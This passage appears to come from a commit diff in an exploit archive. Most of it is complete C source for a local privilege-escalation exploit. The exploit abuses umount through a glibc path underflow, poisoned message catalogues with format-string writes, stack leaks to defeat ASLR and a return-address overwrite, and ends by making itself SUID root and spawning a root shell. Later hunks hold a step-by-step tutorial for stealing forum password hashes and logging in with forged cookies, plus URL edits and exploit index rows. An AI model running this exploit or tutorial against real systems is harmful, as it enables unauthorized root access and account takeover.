int result=write(catalogueFd, catalogueData, catalogueDataLength);
assert(result==catalogueDataLength);
close(catalogueFd);
free(catalogueData);
return(0);
}
void createDirectoryRecursive(char *namespaceMountBaseDir, char *pathName) {
char pathBuffer[PATH_MAX];
int pathNameLength=0;
while(1) {
char *nextPathSep=strchr(pathName+pathNameLength, '/');
if(nextPathSep) {
pathNameLength=nextPathSep-pathName;
} else {
pathNameLength=strlen(pathName);
}
int result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/%.*s",
namespaceMountBaseDir, pathNameLength, pathName);
assert(result<PATH_MAX);
result=mkdir(pathBuffer, 0755);
assert((!result)||(errno==EEXIST));
if(!pathName[pathNameLength])
break;
pathNameLength++;
}
}
/** This child function prepares the namespaced mount point and
* then waits to be killed later on.
*/
static int usernsChildFunction() {
while(geteuid()!=0) {
sched_yield();
}
int result=mount("tmpfs", "/tmp", "tmpfs", MS_MGC_VAL, NULL);
assert(!result);
assert(!chdir("/tmp"));
int handle=open("ready", O_WRONLY|O_CREAT|O_EXCL|O_NOFOLLOW|O_NOCTTY, 0644);
assert(handle>=0);
close(handle);
sleep(100000);
}
/** Prepare a process living in an own mount namespace and setup
* the mount structure appropriately. The process is created
* in a way allowing cleanup at program end by just killing it,
* thus removing the namespace.
* @return the pid of that process or -1 on error.
*/
pid_t prepareNamespacedProcess() {
if(namespacedProcessPid==-1) {
fprintf(stderr, "No pid supplied via command line, trying to create a namespace\nCAVEAT: /proc/sys/kernel/unprivileged_userns_clone must be 1 on systems with USERNS protection.\n");
char *stackData=(char*)malloc(1<<20);
assert(stackData);
namespacedProcessPid=clone(usernsChildFunction, stackData+(1<<20),
CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, NULL);
if(namespacedProcessPid==-1) {
fprintf(stderr, "USERNS clone failed: %d (%s)\n", errno, strerror(errno));
return(-1);
}
char idMapFileName[128];
char idMapData[128];
sprintf(idMapFileName, "/proc/%d/setgroups", namespacedProcessPid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
assert(setGroupsFd>=0);
int result=write(setGroupsFd, "deny", 4);
assert(result>0);
close(setGroupsFd);
sprintf(idMapFileName, "/proc/%d/uid_map", namespacedProcessPid);
int uidMapFd=open(idMapFileName, O_WRONLY);
assert(uidMapFd>=0);
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
assert(result>0);
close(uidMapFd);
sprintf(idMapFileName, "/proc/%d/gid_map", namespacedProcessPid);
int gidMapFd=open(idMapFileName, O_WRONLY);
assert(gidMapFd>=0);
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
assert(result>0);
close(gidMapFd);
// After setting the maps for the child process, the child may
// start setting up the mount point. Wait for that to complete.
sleep(1);
fprintf(stderr, "Namespaced filesystem created with pid %d\n",
namespacedProcessPid);
}
osReleaseExploitData=osSpecificExploitDataList;
if(osRelease) {
// If an OS was detected, try to find it in list. Otherwise use
// default.
for(int tPos=0; osSpecificExploitDataList[tPos]; tPos+=4) {
if(!strcmp(osSpecificExploitDataList[tPos], osRelease)) {
osReleaseExploitData=osSpecificExploitDataList+tPos;
break;
}
}
}
char pathBuffer[PATH_MAX];
int result=snprintf(pathBuffer, sizeof(pathBuffer), "/proc/%d/cwd",
namespacedProcessPid);
assert(result<PATH_MAX);
char *namespaceMountBaseDir=strdup(pathBuffer);
assert(namespaceMountBaseDir);
// Create directories needed for umount to proceed to final state
// "not mounted".
createDirectoryRecursive(namespaceMountBaseDir, "(unreachable)/x");
result=snprintf(pathBuffer, sizeof(pathBuffer),
"(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES", osReleaseExploitData[2]);
assert(result<PATH_MAX);
createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"(unreachable)/tmp/%s/X.X/LC_MESSAGES", osReleaseExploitData[2]);
createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"(unreachable)/tmp/%s/X.x/LC_MESSAGES", osReleaseExploitData[2]);
createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
// Create symlink to trigger underflows.
result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/(unreachable)/tmp/down",
namespaceMountBaseDir);
assert(result<PATH_MAX);
result=symlink(osReleaseExploitData[1], pathBuffer);
assert(!result||(errno==EEXIST));
// getdate will leave that string in rdi to become the filename
// to execute for the next round.
char *selfPathName=realpath("/proc/self/exe", NULL);
result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/DATEMSK",
namespaceMountBaseDir);
assert(result<PATH_MAX);
int handle=open(pathBuffer, O_WRONLY|O_CREAT|O_TRUNC, 0755);
assert(handle>0);
result=snprintf(pathBuffer, sizeof(pathBuffer), "#!%s\nunused",
selfPathName);
assert(result<PATH_MAX);
result=write(handle, pathBuffer, result);
close(handle);
free(selfPathName);
// Write the initial message catalogue to trigger stack dumping
// and to make the "umount" call privileged by toggling the "restricted"
// flag in the context.
result=snprintf(pathBuffer, sizeof(pathBuffer),
"%s/(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES/util-linux.mo",
namespaceMountBaseDir, osReleaseExploitData[2]);
assert(result<PATH_MAX);
char *stackDumpStr=(char*)malloc(0x80+6*(STACK_LONG_DUMP_BYTES/8));
assert(stackDumpStr);
char *stackDumpStrEnd=stackDumpStr;
stackDumpStrEnd+=sprintf(stackDumpStrEnd, "AA%%%d$lnAAAAAA",
((int*)osReleaseExploitData[3])[ED_STACK_OFFSET_CTX]);
for(int dumpCount=(STACK_LONG_DUMP_BYTES/8); dumpCount; dumpCount--) {
memcpy(stackDumpStrEnd, "%016lx", 6);
stackDumpStrEnd+=6;
}
// We wrote allready 8 bytes, write so many more to produce a
// count of 'L' and write that to the stack. As all writes so
// sum up to a count aligned by 8, and 'L'==0x4c, we will have
// to write at least 4 bytes, which is longer than any "%hhx"
// format string output. Hence do not care about the byte content
// here. The target write address has a 16 byte alignment due
// to varg structure.
stackDumpStrEnd+=sprintf(stackDumpStrEnd, "%%1$%dhhx%%%d$hhn",
('L'-8-STACK_LONG_DUMP_BYTES*2)&0xff,
STACK_LONG_DUMP_BYTES/16);
*stackDumpStrEnd=0;
result=writeMessageCatalogue(pathBuffer,
(char*[]){
"%s: mountpoint not found",
"%s: not mounted",
"%s: target is busy\n (In some cases useful info about processes that\n use the device is found by lsof(8) or fuser(1).)"
},
(char*[]){"1234", stackDumpStr, "5678"},
3);
assert(!result);
free(stackDumpStr);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"%s/(unreachable)/tmp/%s/X.X/LC_MESSAGES/util-linux.mo",
namespaceMountBaseDir, osReleaseExploitData[2]);
assert(result<PATH_MAX);
result=mknod(pathBuffer, S_IFIFO|0666, S_IFIFO);
assert((!result)||(errno==EEXIST));
secondPhaseTriggerPipePathname=strdup(pathBuffer);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"%s/(unreachable)/tmp/%s/X.x/LC_MESSAGES/util-linux.mo",
namespaceMountBaseDir, osReleaseExploitData[2]);
secondPhaseCataloguePathname=strdup(pathBuffer);
free(namespaceMountBaseDir);
return(namespacedProcessPid);
}
/** Create the format string to write an arbitrary value to the
* stack. The created format string avoids to interfere with
* the complex fprintf format handling logic by accessing fprintf
* internal state on stack. Thus the modification method does
* not depend on that ftp internals. The current libc fprintf
* implementation copies values for formatting before applying
* the %n writes, therefore pointers changed by fprintf operation
* can only be utilized with the next fprintf invocation. As
* we cannot rely on a stack having a suitable number of pointers
* ready for arbitrary writes, we need to create those pointers
* one by one. Everything needed is pointer on stack pointing
* to another valid pointer and 4 helper pointers pointing to
* writeable memory. The **argv list matches all those requirements.
* @param printfArgvValuePos the position of the argv pointer from
* printf format string view.
* @param argvStackAddress the address of the argv list, where
* the argv[0] pointer can be read.
* @param printfArg0ValuePos the position of argv list containing
* argv[0..n] pointers.
* @param mainFunctionReturnAddress the address on stack where
* the return address from the main() function to _libc_start()
* is stored.
* @param writeValue the value to write to mainFunctionReturnAddress
*/
void createStackWriteFormatString(
char *formatBuffer, int bufferSize, int printfArgvValuePos,
void *argvStackAddress, int printfArg0ValuePos,
void *mainFunctionReturnAddress, unsigned short *writeData,
int writeDataLength) {
int result=0;
int currentValue=-1;
for(int nextWriteValue=0; nextWriteValue<0x10000;) {
// Find the lowest value to write.
nextWriteValue=0x10000;
for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
int value=writeData[valuePos];
if((value>currentValue)&&(value<nextWriteValue))
nextWriteValue=value;
}
if(currentValue<0)
currentValue=0;
if(currentValue!=nextWriteValue) {
result=snprintf(formatBuffer, bufferSize, "%%1$%1$d.%1$ds",
nextWriteValue-currentValue);
formatBuffer+=result;
bufferSize-=result;
currentValue=nextWriteValue;
}
for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
if(writeData[valuePos]==nextWriteValue) {
result=snprintf(formatBuffer, bufferSize,
"%%%d$hn", printfArg0ValuePos+valuePos+1);
formatBuffer+=result;
bufferSize-=result;
}
}
}
// Print the return function address location number of bytes
// except 8 (those from the LABEL counter) and write the value
// to arg1.
int writeCount=((int)mainFunctionReturnAddress-18)&0xffff;
result=snprintf(formatBuffer, bufferSize,
"%%1$%d.%ds%%1$s%%1$s%%%d$hn",
writeCount, writeCount, printfArg0ValuePos);
formatBuffer+=result;
bufferSize-=result;
// Write the LABEL 6 more times, thus multiplying the the single
// byte write pointer to an 8-byte aligned argv-list pointer and
// update argv[0] to point to argv[1..n].
writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
result=snprintf(formatBuffer, bufferSize,
"%%1$s%%1$s%%1$s%%1$s%%1$s%%1$s%%1$%d.%ds%%%d$hn",
writeCount, writeCount, printfArgvValuePos);
formatBuffer+=result;
bufferSize-=result;
// Append a debugging preamble.
result=snprintf(formatBuffer, bufferSize, "-%%35$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%78$s\n",
printfArgvValuePos, printfArg0ValuePos-1, printfArg0ValuePos,
printfArg0ValuePos+1, printfArg0ValuePos+2, printfArg0ValuePos+3,
printfArg0ValuePos+4, printfArg0ValuePos+5, printfArg0ValuePos+6);
formatBuffer+=result;
bufferSize-=result;
}
/** Wait for the trigger pipe to open. The pipe will be closed
* immediately after opening it.
* @return 0 when the pipe was opened before hitting a timeout.
*/
int waitForTriggerPipeOpen(char *pipeName) {
struct timespec startTime, currentTime;
int result=clock_gettime(CLOCK_MONOTONIC, &startTime);
startTime.tv_sec+=10;
assert(!result);
while(1) {
int pipeFd=open(pipeName, O_WRONLY|O_NONBLOCK);
if(pipeFd>=0) {
close(pipeFd);
break;
}
result=clock_gettime(CLOCK_MONOTONIC, &currentTime);
if(currentTime.tv_sec>startTime.tv_sec) {
return(-1);
}
currentTime.tv_sec=0;
currentTime.tv_nsec=100000000;
nanosleep(&currentTime, NULL);
}
return(0);
}
/** Invoke umount to gain root privileges.
* @return 0 if the umount process terminated with expected exit
* status.
*/
int attemptEscalation() {
int escalationSuccess=-1;
char targetCwd[64];
snprintf(
targetCwd, sizeof(targetCwd)-1, "/proc/%d/cwd", namespacedProcessPid);
int pipeFds[2];
int result=pipe(pipeFds);
assert(!result);
pid_t childPid=fork();
assert(childPid>=0);
if(!childPid) {
// This is the child process.
close(pipeFds[0]);
fprintf(stderr, "Starting subprocess\n");
dup2(pipeFds[1], 1);
dup2(pipeFds[1], 2);
close(pipeFds[1]);
result=chdir(targetCwd);
assert(!result);
// Create so many environment variables for a kind of "stack spraying".
int envCount=UMOUNT_ENV_VAR_COUNT;
char **umountEnv=(char**)malloc((envCount+1)*sizeof(char*));
assert(umountEnv);
umountEnv[envCount--]=NULL;
umountEnv[envCount--]="LC_ALL=C.UTF-8";
while(envCount>=0) {
umountEnv[envCount--]="AANGUAGE=X.X";
}
// Use the built-in C locale.
// Invoke umount first by overwriting heap downwards using links
// for "down", then retriggering another error message ("busy")
// with hopefully similar same stack layout for other path "/".
char* umountArgs[]={umountPathname, "/", "/", "/", "/", "/", "/", "/", "/", "/", "/", "down", "LABEL=78", "LABEL=789", "LABEL=789a", "LABEL=789ab", "LABEL=789abc", "LABEL=789abcd", "LABEL=789abcde", "LABEL=789abcdef", "LABEL=789abcdef0", "LABEL=789abcdef0", NULL};
result=execve(umountArgs[0], umountArgs, umountEnv);
assert(!result);
}
close(pipeFds[1]);
int childStdout=pipeFds[0];
int escalationPhase=0;
char readBuffer[1024];
int readDataLength=0;
char stackData[STACK_LONG_DUMP_BYTES];
int stackDataBytes=0;
struct pollfd pollFdList[1];
pollFdList[0].fd=childStdout;
pollFdList[0].events=POLLIN;
// Now learn about the binary, prepare data for second exploitation
// phase. The phases should be:
// * 0: umount executes, glibc underflows and causes an util-linux.mo
// file to be read, that contains a poisonous format string.
// Successful poisoning results in writing of 8*'A' preamble,
// we are looking for to indicate end of this phase.
// * 1: The poisoned process writes out stack content to defeat
// ASLR. Reading all relevant stack end this phase.
// * 2: The poisoned process changes the "LANGUAGE" parameter,
// thus triggering re-read of util-linux.mo. To avoid races,
// we let umount open a named pipe, thus blocking execution.
// As soon as the pipe is ready for writing, we write a modified
// version of util-linux.mo to another file because the pipe
// cannot be used for sending the content.
// * 3: We read umount output to avoid blocking the process and
// wait for it to ROP execute fchown/fchmod and exit.
while(1) {
if(escalationPhase==2) {
// We cannot use the standard poll from below to monitor the pipe,
// but also we do not want to block forever. Wait for the pipe
// in nonblocking mode and then continue with next phase.
result=waitForTriggerPipeOpen(secondPhaseTriggerPipePathname);
if(result) {
goto attemptEscalationCleanup;
}
escalationPhase++;
}
// Wait at most 10 seconds for IO.
result=poll(pollFdList, 1, 10000);
if(!result) {
// We ran into a timeout. This might be the result of a deadlocked
// child, so kill the child and retry.
fprintf(stderr, "Poll timed out\n");
goto attemptEscalationCleanup;
}
// Perform the IO operations without blocking.
if(pollFdList[0].revents&(POLLIN|POLLHUP)) {
result=read(
pollFdList[0].fd, readBuffer+readDataLength,
sizeof(readBuffer)-readDataLength);
if(!result) {
if(escalationPhase<3) {
// Child has closed the socket unexpectedly.
goto attemptEscalationCleanup;
}
break;
}
if(result<0) {
fprintf(stderr, "IO error talking to child\n");
goto attemptEscalationCleanup;
}
readDataLength+=result;
// Handle the data depending on escalation phase.
int moveLength=0;
switch(escalationPhase) {
case 0: // Initial sync: read A*8 preamble.
if(readDataLength<8)
continue;
char *preambleStart=memmem(readBuffer, readDataLength,
"AAAAAAAA", 8);
if(!preambleStart) {
// No preamble, move content only if buffer is full.
if(readDataLength==sizeof(readBuffer))
moveLength=readDataLength-7;
break;
}
// We found, what we are looking for. Start reading the stack.
escalationPhase++;
moveLength=preambleStart-readBuffer+8;
case 1: // Read the stack.
// Consume stack data until or local array is full.
while(moveLength+16<=readDataLength) {
result=sscanf(readBuffer+moveLength, "%016lx",
(int*)(stackData+stackDataBytes));
if(result!=1) {
// Scanning failed, the data injection procedure apparently did
// not work, so this escalation failed.
goto attemptEscalationCleanup;
}
moveLength+=sizeof(long)*2;
stackDataBytes+=sizeof(long);
// See if we reached end of stack dump already.
if(stackDataBytes==sizeof(stackData))
break;
}
if(stackDataBytes!=sizeof(stackData))
break;
// All data read, use it to prepare the content for the next phase.
fprintf(stderr, "Stack content received, calculating next phase\n");
int *exploitOffsets=(int*)osReleaseExploitData[3];
// This is the address, where source Pointer is pointing to.
void *sourcePointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]];
// This is the stack address source for the target pointer.
void *sourcePointerLocation=sourcePointerTarget-0xd0;
void *targetPointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARG0]];
// This is the stack address of the libc start function return
// pointer.
void *libcStartFunctionReturnAddressSource=sourcePointerLocation-0x10;
fprintf(stderr, "Found source address location %p pointing to target address %p with value %p, libc offset is %p\n",
sourcePointerLocation, sourcePointerTarget,
targetPointerTarget, libcStartFunctionReturnAddressSource);
// So the libcStartFunctionReturnAddressSource is the lowest address
// to manipulate, targetPointerTarget+...
void *libcStartFunctionAddress=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]-2];
void *stackWriteData[]={
libcStartFunctionAddress+exploitOffsets[ED_LIBC_GETDATE_DELTA],
libcStartFunctionAddress+exploitOffsets[ED_LIBC_EXECL_DELTA]
};
fprintf(stderr, "Changing return address from %p to %p, %p\n",
libcStartFunctionAddress, stackWriteData[0],
stackWriteData[1]);
escalationPhase++;
char *escalationString=(char*)malloc(1024);
createStackWriteFormatString(
escalationString, 1024,
exploitOffsets[ED_STACK_OFFSET_ARGV]+1, // Stack position of argv pointer argument for fprintf
sourcePointerTarget, // Base value to write
exploitOffsets[ED_STACK_OFFSET_ARG0]+1, // Stack position of argv[0] pointer ...
libcStartFunctionReturnAddressSource,
(unsigned short*)stackWriteData,
sizeof(stackWriteData)/sizeof(unsigned short)
);
fprintf(stderr, "Using escalation string %s", escalationString);
result=writeMessageCatalogue(
secondPhaseCataloguePathname,
(char*[]){
"%s: mountpoint not found",
"%s: not mounted",
"%s: target is busy\n (In some cases useful info about processes that\n use the device is found by lsof(8) or fuser(1).)"
},
(char*[]){
escalationString,
"BBBB5678%3$s\n",
"BBBBABCD%s\n"},
3);
assert(!result);
break;
case 2:
case 3:
// Wait for pipe connection and output any result from mount.
readDataLength=0;
break;
default:
fprintf(stderr, "Logic error, state %d\n", escalationPhase);
goto attemptEscalationCleanup;
}
if(moveLength) {
memmove(readBuffer, readBuffer+moveLength, readDataLength-moveLength);
readDataLength-=moveLength;
}
}
}
attemptEscalationCleanup:
// Wait some time to avoid killing umount even when exploit was
// successful.
sleep(1);
close(childStdout);
// It is safe to kill the child as we did not wait for it to finish
// yet, so at least the zombie process is still here.
kill(childPid, SIGKILL);
pid_t waitedPid=waitpid(childPid, NULL, 0);
assert(waitedPid==childPid);
return(escalationSuccess);
}
/** This function invokes the shell specified via environment
* or the default shell "/bin/sh" when undefined. The function
* does not return on success.
* @return -1 on error
*/
int invokeShell(char *shellName) {
if(!shellName)
shellName=getenv("SHELL");
if(!shellName)
shellName="/bin/sh";
char* shellArgs[]={shellName, NULL};
execve(shellName, shellArgs, environ);
fprintf(stderr, "Failed to launch shell %s\n", shellName);
return(-1);
}
int main(int argc, char **argv) {
char *programmName=argv[0];
int exitStatus=1;
if(getuid()==0) {
fprintf(stderr, "%s: you are already root, invoking shell ...\n",
programmName);
invokeShell(NULL);
return(1);
}
if(geteuid()==0) {
struct stat statBuf;
int result=stat("/proc/self/exe", &statBuf);
assert(!result);
if(statBuf.st_uid||statBuf.st_gid) {
fprintf(stderr, "%s: internal invocation, setting SUID mode\n",
programmName);
int handle=open("/proc/self/exe", O_RDONLY);
fchown(handle, 0, 0);
fchmod(handle, 04755);
exit(0);
}
fprintf(stderr, "%s: invoked as SUID, invoking shell ...\n",
programmName);
setresgid(0, 0, 0);
setresuid(0, 0, 0);
invokeShell(NULL);
return(1);
}
for(int argPos=1; argPos<argc;) {
char *argName=argv[argPos++];
if(argPos==argc) {
fprintf(stderr, "%s requires parameter\n", argName);
return(1);
}
if(!strcmp("--Pid", argName)) {
char *endPtr;
namespacedProcessPid=strtoll(argv[argPos++], &endPtr, 10);
if((errno)||(*endPtr)) {
fprintf(stderr, "Invalid pid value\n");
return(1);
}
killNamespacedProcessFlag=0;
} else {
fprintf(stderr, "Unknown argument %s\n", argName);
return(1);
}
}
fprintf(stderr, "%s: setting up environment ...\n", programmName);
if(!osRelease) {
if(detectOsRelease()) {
fprintf(stderr, "Failed to detect OS version, continuing anyway\n");
}
}
umountPathname=findUmountBinaryPathname("/bin");
if((!umountPathname)&&(getenv("PATH")))
umountPathname=findUmountBinaryPathname(getenv("PATH"));
if(!umountPathname) {
fprintf(stderr, "Failed to locate \"umount\" binary, is PATH correct?\n");
goto preReturnCleanup;
}
fprintf(stderr, "%s: using umount at \"%s\".\n", programmName,
umountPathname);
pid_t nsPid=prepareNamespacedProcess();
if(nsPid<0) {
goto preReturnCleanup;
}
// Gaining root can still fail due to ASLR creating additional
// path separators in memory addresses residing in area to be
// overwritten by buffer underflow. Retry regaining until this
// executable changes uid/gid.
int escalateMaxAttempts=10;
int excalateCurrentAttempt=0;
while(excalateCurrentAttempt<escalateMaxAttempts) {
excalateCurrentAttempt++;
fprintf(stderr, "Attempting to gain root, try %d of %d ...\n",
excalateCurrentAttempt, escalateMaxAttempts);
attemptEscalation();
struct stat statBuf;
int statResult=stat("/proc/self/exe", &statBuf);
int stat(const char *pathname, struct stat *buf);
if(statResult) {
fprintf(stderr, "Failed to stat /proc/self/exe: /proc not mounted, access restricted, executable deleted?\n");
break;
}
if(statBuf.st_uid==0) {
fprintf(stderr, "Executable now root-owned\n");
goto escalateOk;
}
}
fprintf(stderr, "Escalation FAILED, maybe target system not (yet) supported by exploit!\n");
preReturnCleanup:
if(namespacedProcessPid>0) {
if(killNamespacedProcessFlag) {
kill(namespacedProcessPid, SIGKILL);
} else {
// We used an existing namespace or chroot to escalate. Remove
// the files created there.
fprintf(stderr, "No namespace cleanup for preexisting namespaces yet, do it manually.\n");
}
}
if(!exitStatus) {
fprintf(stderr, "Cleanup completed, re-invoking binary\n");
invokeShell("/proc/self/exe");
exitStatus=1;
}
return(exitStatus);
escalateOk:
exitStatus=0;
goto preReturnCleanup;
}

2
exploits/multiple/remote/1292.pm
View file

@ -1,4 +1,4 @@
# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke
# Reference: http://www.milw0rm.com/id.php?id=1231 (https://www.exploit-db.com/exploits/1231/) (kcope) /str0ke
#
# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution

10
exploits/php/webapps/1014.txt
View file

@ -2,13 +2,13 @@
Tutorial for the recent exploit released by Petey Beege.
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
a. perl -MCPAN -e 'shell'
b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id
ex. inv.pl http://forums.elitesite.com 2 2
ex. inv.pl http://forums.example.com 2 2
Where 2 is the login id and 2 for version 2 of IPB.
@ -18,13 +18,13 @@ C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb
Add the following entries:
forums.elitesite.com FALSE / FALSE 1148708747 member_id 1
forums.elitesite.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c
forums.example.com FALSE / FALSE 1148708747 member_id 1
forums.example.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c
Notice the value of member_id and pass_hash taken from the values
generated by the exploit.
5. Fire up Mozilla Firefox and login to http://forums.elitesite.com
5. Fire up Mozilla Firefox and login to http://forums.example.com
Enjoy!

2
exploits/php/webapps/1367.php
View file

@ -3,7 +3,7 @@
#
# Flatnuke 2.5.6 privilege escalation / remote commands execution exploit
# (works with magic_quotes_gpc off, try this with 2.5.5:
# http://www.milw0rm.com/id.php?id=1140)
# http://www.milw0rm.com/id.php?id=1140 (https://www.exploit-db.com/exploits/1140/))
#
# coded by rgod at http://rgod.altervista.org
# mail: retrogod at aliceposta it

2
exploits/php/webapps/1457.txt
View file

@ -1,4 +1,4 @@
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 (https://www.exploit-db.com/exploits/1103/)
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

4
exploits/windows/remote/1224.html
View file

@ -8,7 +8,7 @@ _______________________________________________________________________________
iS; .sS* Copyright (C) 2003-2005 by Berend-Jan Wever.
.SS sSSSSSSP <berendjanwever@gmail.com>
_______________________________________________________________________________
Official release: http://www.milw0rm.com/id.php?id=1224
Official release: http://www.milw0rm.com/id.php?id=1224 (https://www.exploit-db.com/exploits/1224/)
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
@ -224,7 +224,7 @@ _______________________________________________________________________________
"<H2>Exploit</H2>" +
"Attack URL (size: " +
number(sURL.length*2) + " bytes):<BR>" +
"&quot;" + escape(sURL) + "&quot;<BR><BR>";
""" + escape(sURL) + ""<BR><BR>";
// Ask if you want to get pwned
exploitStatusElement.innerHTML =
"<BUTTON onclick=\"FiredFox();\">" +

2
exploits/windows/remote/693.c
View file

@ -156,6 +156,6 @@ int main(int argc, char **argv)
//2004-10-23
//Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit
//KaGra
//http://www.milw0rm.com/id.php?id=592
//http://www.milw0rm.com/id.php?id=592 (https://www.exploit-db.com/exploits/592/)
// milw0rm.com [2004-12-16]

51
files_exploits.csv
View file

@ -5255,6 +5255,7 @@ id,file,description,date,author,type,platform,port
43718,exploits/windows/dos/43718.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Write",2018-01-17,"Google Security Research",dos,windows,
43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows,
43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows,
43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -5680,7 +5681,7 @@ id,file,description,date,author,type,platform,port
42361,exploits/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42362,exploits/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42363,exploits/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",dos,multiple,
42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free (1)",2017-07-24,"Google Security Research",dos,multiple,
42365,exploits/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42366,exploits/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42367,exploits/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
@ -5790,7 +5791,7 @@ id,file,description,date,author,type,platform,port
43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,dos,hardware,
43165,exploits/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",dos,windows,
43166,exploits/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free (2)",2017-11-22,"Google Security Research",dos,multiple,
43168,exploits/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43169,exploits/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43170,exploits/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",dos,multiple,
@ -5852,8 +5853,8 @@ id,file,description,date,author,type,platform,port
120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation",2003-11-13,Li0n7,local,linux,
122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,local,windows,
125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",local,bsd,
129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-02,"Christophe Devine",local,linux,
131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-05,"Wojciech Purczynski",local,linux,
129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)",2003-12-02,"Christophe Devine",local,linux,
131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)",2003-12-05,"Wojciech Purczynski",local,linux,
